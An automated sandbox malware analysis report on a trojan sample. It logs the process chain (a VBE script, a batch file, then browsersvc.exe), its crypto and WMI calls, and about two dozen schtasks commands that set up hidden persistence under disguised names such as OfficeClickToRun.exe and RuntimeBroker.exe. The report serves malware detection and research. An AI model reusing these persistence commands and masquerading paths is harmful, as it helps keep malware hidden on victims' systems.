            Source: browsersvc.exe, 00000004.00000002.1771032686.0000000003283000.00000004.00000800.00020000.00000000.sdmp, UAhpvIJrmb.exe, 00000023.00000002.1787477643.00000000031CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

            System Summary

            barindex
            Windows Scripting host queries suspicious COM object (likely to drop second stage)
            Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeCode function: 0_2_009F718C: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_009F718C
            Source: C:\chainSurrogate\browsersvc.exeFile created: C:\Windows\L2Schemas\OfficeClickToRun.exeJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeFile created: C:\Windows\L2Schemas\e6c9b481da804fJump to behavior
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeCode function: 0_2_009F857B0_2_009F857B
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeCode function: 0_2_00A070BF0_2_00A070BF
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeCode function: 0_2_00A1D00E0_2_00A1D00E
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeCode function: 0_2_009F407E0_2_009F407E
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeCode function: 0_2_00A211940_2_00A21194
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeCode function: 0_2_009F32810_2_009F3281
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeCode function: 0_2_009FE2A00_2_009FE2A0
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeCode function: 0_2_00A102F60_2_00A102F6
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeCode function: 0_2_00A066460_2_00A06646
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeCode function: 0_2_00A037C10_2_00A037C1
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeCode function: 0_2_009F27E80_2_009F27E8
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeCode function: 0_2_00A1473A0_2_00A1473A
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeCode function: 0_2_00A1070E0_2_00A1070E
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeCode function: 0_2_009FE8A00_2_009FE8A0
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeCode function: 0_2_00A149690_2_00A14969
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeCode function: 0_2_009FF9680_2_009FF968
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeCode function: 0_2_00A03A3C0_2_00A03A3C
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeCode function: 0_2_00A06A7B0_2_00A06A7B
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeCode function: 0_2_00A1CB600_2_00A1CB60
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeCode function: 0_2_00A10B430_2_00A10B43
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeCode function: 0_2_00A05C770_2_00A05C77
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeCode function: 0_2_00A0FDFA0_2_00A0FDFA
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeCode function: 0_2_009FED140_2_009FED14
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeCode function: 0_2_00A03D6D0_2_00A03D6D
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeCode function: 0_2_009FBE130_2_009FBE13
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeCode function: 0_2_009FDE6C0_2_009FDE6C
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeCode function: 0_2_009F5F3C0_2_009F5F3C
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeCode function: 0_2_00A10F780_2_00A10F78
            Source: C:\chainSurrogate\browsersvc.exeCode function: 4_2_00007FFD9BAB35554_2_00007FFD9BAB3555
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeCode function: 35_2_00007FFD9BAB355535_2_00007FFD9BAB3555
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeCode function: String function: 00A0E360 appears 52 times
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeCode function: String function: 00A0ED00 appears 31 times
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeCode function: String function: 00A0E28C appears 35 times
            Source: browsersvc.exe.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
            Source: UAhpvIJrmb.exe.4.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
            Source: DFpUKTL6kg.exe, 00000000.00000003.1651244465.0000000002FA9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe.mui` vs DFpUKTL6kg.exe
            Source: DFpUKTL6kg.exe, 00000000.00000003.1651244465.0000000002FA9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe` vs DFpUKTL6kg.exe
            Source: DFpUKTL6kg.exe, 00000000.00000003.1648113959.000000000681F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibGLESv2.dll4 vs DFpUKTL6kg.exe
            Source: DFpUKTL6kg.exe, 00000000.00000003.1648627478.0000000007120000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibGLESv2.dll4 vs DFpUKTL6kg.exe
            Source: DFpUKTL6kg.exe, 00000000.00000003.1649144803.000000000712B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibGLESv2.dll4 vs DFpUKTL6kg.exe
            Source: DFpUKTL6kg.exe, 00000000.00000002.1652162323.0000000002FAA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe.mui` vs DFpUKTL6kg.exe
            Source: DFpUKTL6kg.exe, 00000000.00000002.1652162323.0000000002FAA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe` vs DFpUKTL6kg.exe
            Source: DFpUKTL6kg.exeBinary or memory string: OriginalFilenamelibGLESv2.dll4 vs DFpUKTL6kg.exe
            Source: DFpUKTL6kg.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 0.3.DFpUKTL6kg.exe.716d533.1.raw.unpack, GxpHieXh78ehHiIiPXV.csCryptographic APIs: 'TransformBlock'
            Source: 0.3.DFpUKTL6kg.exe.716d533.1.raw.unpack, GxpHieXh78ehHiIiPXV.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.3.DFpUKTL6kg.exe.716d533.1.raw.unpack, dMHUKffUPGQiwfC8LCj.csCryptographic APIs: 'CreateDecryptor'
            Source: 0.3.DFpUKTL6kg.exe.716d533.1.raw.unpack, dMHUKffUPGQiwfC8LCj.csCryptographic APIs: 'CreateDecryptor'
            Source: 0.3.DFpUKTL6kg.exe.686c533.0.raw.unpack, GxpHieXh78ehHiIiPXV.csCryptographic APIs: 'TransformBlock'
            Source: 0.3.DFpUKTL6kg.exe.686c533.0.raw.unpack, GxpHieXh78ehHiIiPXV.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.3.DFpUKTL6kg.exe.686c533.0.raw.unpack, dMHUKffUPGQiwfC8LCj.csCryptographic APIs: 'CreateDecryptor'
            Source: 0.3.DFpUKTL6kg.exe.686c533.0.raw.unpack, dMHUKffUPGQiwfC8LCj.csCryptographic APIs: 'CreateDecryptor'
            Source: 0.3.DFpUKTL6kg.exe.716d533.1.raw.unpack, acvMHVZVlLFT3hCKiXu.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.3.DFpUKTL6kg.exe.716d533.1.raw.unpack, acvMHVZVlLFT3hCKiXu.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.3.DFpUKTL6kg.exe.686c533.0.raw.unpack, acvMHVZVlLFT3hCKiXu.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.3.DFpUKTL6kg.exe.686c533.0.raw.unpack, acvMHVZVlLFT3hCKiXu.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engineClassification label: mal100.troj.evad.winEXE@36/23@1/1
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeCode function: 0_2_009F6EC9 GetLastError,FormatMessageW,0_2_009F6EC9
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeCode function: 0_2_00A09E1C FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_00A09E1C
            Source: C:\chainSurrogate\browsersvc.exeFile created: C:\Program Files (x86)\windows nt\UAhpvIJrmb.exeJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\browsersvc.exe.logJump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeMutant created: NULL
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeMutant created: \Sessions\1\BaseNamedObjects\Local\411b4a688f55af8d6c8739be8cea8bf742f7dd61
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7060:120:WilError_03
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\chainSurrogate\JOucOkolgtw8nKLZO9UO2eSMaA.bat" "
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeCommand line argument: sfxname0_2_00A0D5D4
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeCommand line argument: sfxstime0_2_00A0D5D4
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeCommand line argument: STARTDLG0_2_00A0D5D4
            Source: DFpUKTL6kg.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: DFpUKTL6kg.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
            Source: C:\chainSurrogate\browsersvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\chainSurrogate\browsersvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\chainSurrogate\browsersvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\chainSurrogate\browsersvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\chainSurrogate\browsersvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\chainSurrogate\browsersvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\chainSurrogate\browsersvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\chainSurrogate\browsersvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\chainSurrogate\browsersvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\chainSurrogate\browsersvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\chainSurrogate\browsersvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\chainSurrogate\browsersvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\chainSurrogate\browsersvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\chainSurrogate\browsersvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\chainSurrogate\browsersvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\chainSurrogate\browsersvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\chainSurrogate\browsersvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\chainSurrogate\browsersvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\chainSurrogate\browsersvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\chainSurrogate\browsersvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\chainSurrogate\browsersvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\chainSurrogate\browsersvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\chainSurrogate\browsersvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\chainSurrogate\browsersvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\chainSurrogate\browsersvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\chainSurrogate\browsersvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\chainSurrogate\browsersvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\chainSurrogate\browsersvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\chainSurrogate\browsersvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\chainSurrogate\browsersvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeFile read: C:\Windows\win.iniJump to behavior
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: DFpUKTL6kg.exeReversingLabs: Detection: 73%
            Source: DFpUKTL6kg.exeVirustotal: Detection: 59%
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeFile read: C:\Users\user\Desktop\DFpUKTL6kg.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\DFpUKTL6kg.exe "C:\Users\user\Desktop\DFpUKTL6kg.exe"
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\chainSurrogate\vdfN6ZiS0svPJatLSFe.vbe"
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\chainSurrogate\JOucOkolgtw8nKLZO9UO2eSMaA.bat" "
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\chainSurrogate\browsersvc.exe "C:\chainSurrogate\browsersvc.exe"
            Source: C:\chainSurrogate\browsersvc.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "UAhpvIJrmbU" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\windows nt\UAhpvIJrmb.exe'" /f
            Source: C:\chainSurrogate\browsersvc.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "UAhpvIJrmb" /sc ONLOGON /tr "'C:\Program Files (x86)\windows nt\UAhpvIJrmb.exe'" /rl HIGHEST /f
            Source: C:\chainSurrogate\browsersvc.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "UAhpvIJrmbU" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\windows nt\UAhpvIJrmb.exe'" /rl HIGHEST /f
            Source: C:\chainSurrogate\browsersvc.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "UAhpvIJrmbU" /sc MINUTE /mo 10 /tr "'C:\chainSurrogate\UAhpvIJrmb.exe'" /f
            Source: C:\chainSurrogate\browsersvc.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "UAhpvIJrmb" /sc ONLOGON /tr "'C:\chainSurrogate\UAhpvIJrmb.exe'" /rl HIGHEST /f
            Source: C:\chainSurrogate\browsersvc.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "UAhpvIJrmbU" /sc MINUTE /mo 13 /tr "'C:\chainSurrogate\UAhpvIJrmb.exe'" /rl HIGHEST /f
            Source: C:\chainSurrogate\browsersvc.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 10 /tr "'C:\Windows\L2Schemas\OfficeClickToRun.exe'" /f
            Source: C:\chainSurrogate\browsersvc.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Windows\L2Schemas\OfficeClickToRun.exe'" /rl HIGHEST /f
            Source: C:\chainSurrogate\browsersvc.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 13 /tr "'C:\Windows\L2Schemas\OfficeClickToRun.exe'" /rl HIGHEST /f
            Source: C:\chainSurrogate\browsersvc.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "UAhpvIJrmbU" /sc MINUTE /mo 9 /tr "'C:\Program Files\Google\Chrome\Application\117.0.5938.132\default_apps\UAhpvIJrmb.exe'" /f
            Source: C:\chainSurrogate\browsersvc.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "UAhpvIJrmb" /sc ONLOGON /tr "'C:\Program Files\Google\Chrome\Application\117.0.5938.132\default_apps\UAhpvIJrmb.exe'" /rl HIGHEST /f
            Source: C:\chainSurrogate\browsersvc.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "UAhpvIJrmbU" /sc MINUTE /mo 10 /tr "'C:\Program Files\Google\Chrome\Application\117.0.5938.132\default_apps\UAhpvIJrmb.exe'" /rl HIGHEST /f
            Source: C:\chainSurrogate\browsersvc.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "UAhpvIJrmbU" /sc MINUTE /mo 7 /tr "'C:\Recovery\UAhpvIJrmb.exe'" /f
            Source: C:\chainSurrogate\browsersvc.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "UAhpvIJrmb" /sc ONLOGON /tr "'C:\Recovery\UAhpvIJrmb.exe'" /rl HIGHEST /f
            Source: C:\chainSurrogate\browsersvc.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "UAhpvIJrmbU" /sc MINUTE /mo 13 /tr "'C:\Recovery\UAhpvIJrmb.exe'" /rl HIGHEST /f
            Source: C:\chainSurrogate\browsersvc.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "UAhpvIJrmbU" /sc MINUTE /mo 8 /tr "'C:\Recovery\UAhpvIJrmb.exe'" /rl HIGHEST /f
            Source: C:\chainSurrogate\browsersvc.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 9 /tr "'C:\Recovery\RuntimeBroker.exe'" /f
            Source: C:\chainSurrogate\browsersvc.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Recovery\RuntimeBroker.exe'" /rl HIGHEST /f
            Source: C:\chainSurrogate\browsersvc.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Recovery\RuntimeBroker.exe'" /rl HIGHEST /f
            Source: C:\chainSurrogate\browsersvc.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 8 /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\dllhost.exe'" /f
            Source: C:\chainSurrogate\browsersvc.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\dllhost.exe'" /rl HIGHEST /f
            Source: C:\chainSurrogate\browsersvc.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\dllhost.exe'" /rl HIGHEST /f
            Source: C:\chainSurrogate\browsersvc.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "UAhpvIJrmbU" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\th\UAhpvIJrmb.exe'" /f
            Source: C:\chainSurrogate\browsersvc.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "UAhpvIJrmb" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\th\UAhpvIJrmb.exe'" /rl HIGHEST /f
            Source: C:\chainSurrogate\browsersvc.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "UAhpvIJrmbU" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\th\UAhpvIJrmb.exe'" /rl HIGHEST /f
            Source: C:\chainSurrogate\browsersvc.exeProcess created: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exe "C:\Program Files (x86)\windows nt\UAhpvIJrmb.exe"
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\chainSurrogate\vdfN6ZiS0svPJatLSFe.vbe" Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\chainSurrogate\JOucOkolgtw8nKLZO9UO2eSMaA.bat" "Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\chainSurrogate\browsersvc.exe "C:\chainSurrogate\browsersvc.exe"Jump to behavior
            Source: C:\chainSurrogate\browsersvc.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "UAhpvIJrmbU" /sc MINUTE /mo 10 /tr "'C:\chainSurrogate\UAhpvIJrmb.exe'" /fJump to behavior
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeSection loaded: dxgidebug.dllJump to behavior
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeSection loaded: pcacli.dllJump to behavior
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
